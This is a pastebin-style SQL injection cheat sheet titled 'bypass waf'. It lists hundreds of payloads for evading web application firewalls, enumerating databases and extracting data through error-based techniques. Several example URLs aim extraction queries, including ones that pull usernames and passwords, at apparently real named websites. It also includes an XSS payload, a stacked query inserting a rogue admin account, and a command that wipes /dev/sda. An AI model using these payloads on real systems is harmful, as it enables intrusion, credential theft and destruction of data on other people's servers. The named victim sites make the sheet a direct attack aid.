zurael_sTz

bypass waf

Dec 30th, 2016
  1. https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
  2. String Injection method
  3.  
  4. --'- : +--+ / : -- - : --+- : /*
  5. ) order by 1-- -
  6.  
  7.  
  8. ') order by 1-- -
  9.  
  10. ')order by 1%23%23
  11.  
  12. %')order by 1%23%23
  13.  
  14. Null' order by 100--+
  15.  
  16. Null' order by 9999--+
  17.  
  18. ')group by 99-- -
  19.  
  20. 'group by 119449-- -
  21.  
  22. group by 14;%00
  23.  
  24. 'group/**/by/**/99%23%23
  25.  
  26. ?id=-11%0Aunion%0Aselect 1,2,3,4
  27.  
  28. union select ByPassing method
  29.  
  30. +union+distinct+select+
  31.  
  32. +union+distinctROW+select+
  33.  
  34. /**//*!12345UNION SELECT*//**/
  35.  
  36. /**//*!50000UNION SELECT*//**/
  37.  
  38. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  39.  
  40. +/*!u%6eion*/+/*!se%6cect*/+
  41.  
  42. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  43.  
  44. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  45.  
  46. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  47.  
  48. union /*!50000%53elect*/
  49.  
  50. %55nion %53elect
  51.  
  52. +--+Union+--+Select+--+
  53.  
  54. +UnIoN/*&a=*/SeLeCT/*&a=*/
  55.  
  56. id=1+'UnI"On'+'SeL"ECT' <-MySQL only
  57.  
  58. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  59.  
  60. UnIoN SeLeCt CoNcAt(version())--
  61.  
  62. uNiOn aLl sElEcT
  63.  
  64. uUNIONnion all sSELECTelect
  65.  
  66. /*!%55NiOn*/ /*!%53eLEct*/
  67.  
  68. %55nion(%53elect 1,2,3)-- -
  69.  
  70. +union+distinct+select+
  71.  
  72. +union+distinctROW+select+
  73.  
  74. /**//*!12345UNION SELECT*//**/
  75.  
  76. /**//*!50000UNION SELECT*//**/
  77.  
  78. /**/UNION/**//*!50000SELECT*//**/
  79.  
  80. /*!50000UniON SeLeCt*/
  81.  
  82. union /*!50000%53elect*/
  83.  
  84. +#uNiOn+#sEleCt
  85.  
  86. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  87.  
  88. /*!%55NiOn*/ /*!%53eLEct*/
  89.  
  90. /*!u%6eion*/ /*!se%6cect*/
  91.  
  92. +un/**/ion+se/**/lect
  93.  
  94. uni%0bon+se%0blect
  95.  
  96. %2f**%2funion%2f**%2fselect
  97.  
  98. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  99.  
  100. REVERSE(noinu)+REVERSE(tceles)
  101.  
  102. /*--*/union/*--*/select/*--*/
  103.  
  104. union (/*!/**/ SeleCT */ 1,2,3)
  105.  
  106. /*!union*/+/*!select*/
  107.  
  108. union+/*!select*/
  109.  
  110. /**/union/**/select/**/
  111.  
  112. /**/uNIon/**/sEleCt/**/
  113.  
  114. /**//*!union*//**//*!select*//**/
  115.  
  116. /*!uNIOn*/ /*!SelECt*/
  117.  
  118. +union+distinct+select+
  119.  
  120. +union+distinctROW+select+
  121.  
  122. +UnIOn%0d%0aSeleCt%0d%0a
  123.  
  124. UNION/*&test=1*/SELECT/*&pwn=2*/
  125.  
  126. un?+un/**/ion+se/**/lect+
  127.  
  128. +UNunionION+SEselectLECT+
  129.  
  130. +uni%0bon+se%0blect+
  131.  
  132. %252f%252a*/union%252f%252a /select%252f%252a*/
  133.  
  134. /%2A%2A/union/%2A%2A/select/%2A%2A/
  135.  
  136. %2f**%2funion%2f**%2fselect%2f**%2f
  137.  
  138. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  139.  
  140. /*!UnIoN*/SeLecT+
  141. Union Select by PASS with Url Encoded Method:
  142. %55nion(%53elect)
  143.  
  144. union%20distinct%20select
  145.  
  146. union%20%64istinctRO%57%20select
  147.  
  148. union%2053elect
  149.  
  150. %23?%0auion%20?%23?%0aselect
  151.  
  152. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  153.  
  154. %55nion %53eLEct
  155.  
  156. u%6eion se%6cect
  157.  
  158. unio%6e %73elect
  159.  
  160. unio%6e%20%64istinc%74%20%73elect
  161.  
  162. uni%6fn distinct%52OW s%65lect
  163.  
  164. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74
  165.  
  166. and(0)union%23xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  167. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx%0aselect
  168.  
  169. %55nion(%53elect)
  170. union%20distinct%20select
  171. union%20%64istinctRO%57%20select
  172. union%2053elect
  173. %23?%0auion%20?%23?%0aselect
  174. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  175. %55nion %53eLEct
  176. u%6eion se%6cect
  177. unio%6e %73elect
  178. unio%6e%20%64istinc%74%20%73elect
  179. uni%6fn distinct%52OW s%65lect
  180. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74
  181.  
  182. ===================================================================================================================================
  183. :: Buffer Overflow :: (an oversized value intended to push the real payload past the WAF's inspection limit; this is not a memory-corruption bug)
  184. ===================================================================================================================================
  185. +And(select 1)=(select 0x414)+union+select+1--
  186.  
  187. +And(select 1)=(select 0xAAAA)+union+select+1--
  188.  
  189. +And(select 1)=(select 0x41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+
  190.  
  191. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  192.  
  193. ==================================================================================================================================
  194. :: 400 Bad Request ::
  195. ==================================================================================================================================
  196. --+%0A
  197.  
  198. union+select+1--+%0A,2--+%0A,3--+%0A,4--+%0A,5--+%0A --
  199.  
  200. ==================================================================================================================================
  201. null the parameter
  202. ==================================================================================================================================
  203. id=-1
  204.  
  205. id=null
  206.  
  207. id=1+and+false+
  208.  
  209. id=9999
  210.  
  211. id=1 and 0
  212.  
  213. id==1
  214.  
  215. id=(-1)
  216.  
  217. =======================================================================================================================================
  218. Group_Concat
  219. =======================================================================================================================================
  220. Group_Concat
  221.  
  222. group_concat()
  223.  
  224. /*!group_concat*/()
  225.  
  226. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  227.  
  228. group_concat(,0x3c62723e)
  229.  
  230. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  231.  
  232. CoNcAt()
  233.  
  234. CONCAT(DISTINCT Version())
  235.  
  236. concat(,0x3a,)
  237.  
  238. concat%00()
  239.  
  240. %00CoNcAt()
  241.  
  242. /*!50000cOnCat*/(/*!Version()*/)
  243.  
  244. /*!50000cOnCat*/
  245.  
  246. /**//*!12345cOnCat*/(,0x3a,)
  247.  
  248. concat_ws()
  249.  
  250. concat(0x3a,,0x3c62723e)
  251.  
  252. /*!concat_ws(0x3a,)*/
  253.  
  254. concat_ws(0x3a3a3a,version()
  255.  
  256. CONCAT_WS(CHAR(32,58,32),version(),)
  257.  
  258. REVERSE(tacnoc)
  259.  
  260. binary(version())
  261.  
  262. uncompress(compress(version()))
  263.  
  264. aes_decrypt(aes_encrypt(version(),1),1)
  265.  
  266. ====================================================================================================================================
  267. To make the column numbers appear on the page, append this after the id:
  268. ====================================================================================================================================
  269. id=1+and+1=0+union+select+1,2,3,4,5,6
  270.  
  271. +AND+1=0
  272.  
  273. /*!aND*/ 1 like 0
  274.  
  275. +/*!and*/+1=0
  276.  
  277. +and+2>3+
  278.  
  279. +and(1)=(0)
  280.  
  281. and (1)!=(0)
  282.  
  283. +div+0
  284.  
  285. Having+1=0
  286.  
  287. ===================================================================================================================================
  288. function ByPassing
  289. ===================================================================================================================================
  290. unhex(hex(value))
  291.  
  292. cast(value as char)
  293.  
  294. uncompress(compress(version()))
  295.  
  296. cast(version() as char)
  297.  
  298. aes_decrypt(aes_encrypt(version(),1),1)
  299.  
  300. binary(version())
  301.  
  302. convert(value using ascii)
  303.  
  304. ===================================================================================================================================
  305. avoid source page injection
  306. ===================================================================================================================================
  307. concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
  308.  
  309. “><br>? <img src=”
  310.  
  311. <img src=""/>injection<img src="
  312.  
  313. concat(0x223e,@@version)
  314.  
  315. concat(0x273e27,version(),0x3c212d2d)
  316.  
  317. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  318.  
  319. concat(0x223e,@@version,0x3c696d67207372633d22)
  320.  
  321. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  322.  
  323. concat(0x223e3c62723e,@@version,0x3a,"BlackRose",0x3c696d67207372633d22)
  324.  
  325. concat('</title>',@@version,'<title>')
  326.  
  327. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  328.  
  329. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  330.  
  331. ===================================================================================================================================
  332. get version – DB_NAME – user – HOST_NAME – datadir
  333. ===================================================================================================================================
  334. version()
  335.  
  336. convert(version() using latin1)
  337.  
  338. unhex(hex(version()))
  339.  
  340. @@GLOBAL.VERSION
  341.  
  342. (substr(@@version,1,1)=5) :: 1 true, 0 false
  343.  
  344. # like #
  345.  
  346. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 --
  347.  
  348. ==================================================================================================================================
  349. +and substring(version(),1,1)=4
  350.  
  351. +and substring(version(),1,1)=5
  352.  
  353. +and substring(version(),1,1)=9
  354.  
  355. +and substring(version(),1,1)=10
  356.  
  357. id=1 /*!50094aaaa*/ error
  358.  
  359. id=1 /*!50095aaaa*/ no error
  360.  
  361. id=1 /*!50096aaaa*/ error
  362.  
  363. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  364.  
  365. id=1 /*!40123 1=1*/--+- no error
  366.  
  367. id=1 /*!40122rrrr*/ no error
  368.  
  369. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  370. =================================================================================================================================
  371. DB_NAME()
  372. =================================================================================================================================
  373. @@database
  374. database()
  375. id=vv()
  376. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 --
  377. http://www.marinaplast.com/page.php?id=vv()
  378. @@user
  379. user()
  380. user_name()
  381. system_user()
  382. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 --
  383.  
  384. HOST_NAME()
  385. @@hostname
  386. @@servername
  387. SERVERPROPERTY()
  388.  
  389. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 --
  390. @@datadir
  391. datadir()
  392. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 --
  393. ASPX
  394. and 1=0/@@version
  395. ' and 1=0/@@version;--
  396. ') and 1=@@version--
  397. and 1=0/user;--
  398.  
  399. Requested method
  400. [DUMP DB in 1 Request]
  401.  
  402. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
  403.  
  404. (select(@) from (select (@:=0x00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  405. ===================================================================================================================================
  406. [DUMP DB in 1 Request improve]
  407. ===================================================================================================================================
  408.  
  409. (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  410.  
  411. like
  412. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
  413. ===================================================================================================================================
  414. #2#
  415. ===================================================================================================================================
  416. method like DUMP DB in 1 Request
  417. ===================================================================================================================================
  418. concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  419. like
  420. http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
  421. ===================================================================================================================================
  422. #3#
  423. ===================================================================================================================================
  424. databases
  425.  
  426. (select+count(schema_name) +from+information_schema.schemata)
  427.  
  428. # like #
  429. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  430.  
  431. tables
  432. (select+count(table_name) +from+information_schema.tables)
  433. # like #
  434. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  435.  
  436. columns
  437. (select+count(column_name) +from+information_schema.columns)
  438. # like #
  439. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  440. ===================================================================================================================================
  441. #4#
  442. ===================================================================================================================================
  443. show each table with all of its columns
  444.  
  445. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  446.  
  447. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  448.  
  449. like
  450. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  451. ===================================================================================================================================
  452. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  453. ===================================================================================================================================
  454. filtered requests
  455.  
  456. # tables #
  457. group_concat(/*!table_name*/)
  458.  
  459. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES-- -
  460.  
  461. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  462.  
  463. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()-- -
  464. ===================================================================================================================================
  465. # columns #
  466. ===================================================================================================================================
  467. group_concat(/*!column_name*/)
  468.  
  469. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  470.  
  471. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  472.  
  473. /*!froM*/ table– -
  474. ===================================================================================================================================
  475. #6#
  476. ===================================================================================================================================
  477. bypass method
  478.  
  479. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  480.  
  481. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  482.  
  483. like
  484. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 --
  485. ===================================================================================================================================
  486. #7#
  487. ===================================================================================================================================
  488. bypass method
  489.  
  490. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  491.  
  492. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  493.  
  494. like
  495. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)--
  496.  
  497. ===================================================================================================================================
  498. [+] Union Select:
  499. ===================================================================================================================================
  500. union /*!select*/+
  501. union/**/select/**/
  502. /**/union/**/select/**/
  503. /**/union/*!50000select*/
  504. /**//*!12345UNION SELECT*//**/
  505. /**//*!50000UNION SELECT*//**/
  506. /**/uniUNIONon/**/selSELECTect/**/
  507. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  508. /**//*!union*//**//*!select*//**/
  509. /**/UNunionION/**/SELselectECT/**/
  510. /**//*UnIOn*//**//*SEleCt*//**/
  511. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  512. /**/UNunionION/**/all/**/SELselectECT/**/
  513. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  514. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  515. uni<on all sel<ect
  516. %20union%20/*!select*/%20
  517. union%23aa%0Aselect
  518. union+distinct+select+
  519. union+distinctROW+select+
  520. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  521. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  522. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  523. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  524. /*!u%6eion*/+/*!se%6cect*/+
  525. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  526. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  527. union /*!50000%53elect*/
  528. +%2F**/+Union/*!select*/
  529. %55nion %53elect
  530. +--+Union+--+Select+--+
  531. +UnIoN/*&a=*/SeLeCT/*&a=*/
  532. uNiOn aLl sElEcT
  533. uUNIONnion all sSELECTelect
  534. union(select(1),2,3)
  535. union (select 1111,2222,3333)
  536. union (/*!/**/ SeleCT */ 11)
  537. %0A%09UNION%0CSELECT%10NULL%
  538. /*!union*//*--*//*!all*//*--*//*!select*/
  539. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  540. union+sel%0bect
  541. +uni*on+sel*ect+
  542. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  543. union(select (1),(2),(3),(4),(5))
  544. UNION(SELECT(column)FROM(table))
  545. id=1+'UnI"On'+'SeL"ECT' <-MySQL only
  546. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  547. union select 1--+%0A,2--+%0A,3--+%0A etc ....
  548. ===================================================================================================================================
  549. [+] Buffer overflow:
  550. ===================================================================================================================================
  551. +And(select 1)=(select 0x414)+union+select+1--
  552. +And(select 1)=(select 0xAAAA)+union+select+1--
  553. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  554. +and (/*!select*/ 1)=(/*!select*/ 0x414)+
  555. +And(select 1)=(select 0x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+
  556. ===================================================================================================================================
  557. [+] Group Concat:
  558. ===================================================================================================================================
  559. Group_Concat
  560. group_concat()
  561. /*!group_concat*/()
  562. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  563. group_concat(,0x3c62723e)
  564. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  565. CoNcAt()
  566. CONCAT(DISTINCT Version())
  567. concat(,0x3a,)
  568. concat%00()
  569. %00CoNcAt()
  570. /*!50000cOnCat*/(/*!Version()*/)
  571. /*!50000cOnCat*/
  572. /**//*!12345cOnCat*/(,0x3a,)
  573. concat_ws()
  574. concat(0x3a,,0x3c62723e)
  575. /*!concat_ws(0x3a,)*/
  576. concat_ws(0x3a3a3a,version()
  577. CONCAT_WS(CHAR(32,58,32),version(),)
  578. ===================================================================================================================================
  579. ERROR BASED
  580. ===================================================================================================================================
  581. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
  582.  
  583. Database
  584.  
  585. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  586.  
  587. Table_name
  588.  
  589. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  590.  
  591. Columns
  592.  
  593. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  594.  
  595. extract data
  596.  
  597. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  598.  
  599. Notice the limit function in the query
  600. A website can have more than two databases, so increase the limit offset until you have found all database names
  601. Example: limit 0,1 or limit 1,1 or limit 2,1
  602. ===================================================================================================================================
  603. Differences:
  604. Error Based Query for Database Extraction:
  605. ===================================================================================================================================
  606. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  607.  
  608. Double Query for Database Extraction:
  609.  
  610. and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  611. information_schema.tables group by x)a) and 1=1
  612.  
  613. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  614. concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  615. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  616.  
  617. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  618. concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
  619. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  620. information_schema.tables group by x)a) and 1
  621. ===================================================================================================================================
  622. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))--+
  623. ===================================================================================================================================
  624.  
  625. [translated from Romanian] Download any Linux live image, boot from it and wipe the disk with dd+urandom. After that nobody recovers anything. WARNING: this irreversibly overwrites the whole of /dev/sda; it is a disk-wipe command, not an injection payload - check the device name before running it.
  626. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  627.  
  628. I'd say using concat(0xY)
  629.  
  630. Y being '<script>alert('Text here');</script>' in hex
  631. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  632.  
  633. http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join%20%28select%20database%28%29%29c%29--+
  634.  
  635. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=0x7573657273 <- 'users' as a bare hex literal; the original concat('0x', hex('users')) builds the string "0x7573657273", which never equals a table name
  636.  
  637. =113'+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,' [ ',table_schema,' ] >',table_name,' > ',column_name,0x27293B3C2F7363726970743E))))x),3--+--
  638.  
  639. injection into the SQL database: add a new user (typically needs stacked-query support in the target's DB driver; PHP's classic mysql_query() does not execute a second statement)
  640. INSERT INTO admins (`name`,`password`,`email`) VALUES ('unix','unixunix','unix_chro@yahoo.com')
  641.  
  642. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  643.  
  644. CHALLENGES
  645.  
  646. Code:
  647. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0x7365637572697479))--+-
  648. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1--
  649. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security--
  650. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7-- -
  651. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)--+-
  652. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  653. null'+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata-- x
  654. ===================================================================================================================================
  655. Error Based:
  656. ===================================================================================================================================
  657. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
  658.  
  659. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  660.  
  661. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1-- -
  662. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- -
  663.  
  664. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  665.  
  666. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  667.  
  668. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
  669.  
  670. or 1=convert(int,(@@version))-
  671. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
  672. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  673.  
  674. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))--+-
  675. ===================================================================================================================================
  676. WAF BYPASS BY TOTTI
  677. ===================================================================================================================================
  678.  
  679. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_name)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())-- -
  680.  
  681. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  682.  
  683. ===================================================================================================================================
  684. WUBI - 1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x69)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4--
  685.  
  686. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
  687. (select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) <- initialise @ (the variable the IN clause reads), not @x; with @ left NULL the concat stays NULL and nothing is returned
  688.  
  689. (select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  690. ===================================================================================================================================
  691.  
  692. +and+1=convert(int,SERVERPROPERTY('ProductVersion'))
  693. ===================================================================================================================================
  694.  
  695. http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
  696.  
  697. http://www.websec.ca/kb/sql_injection
  698.  
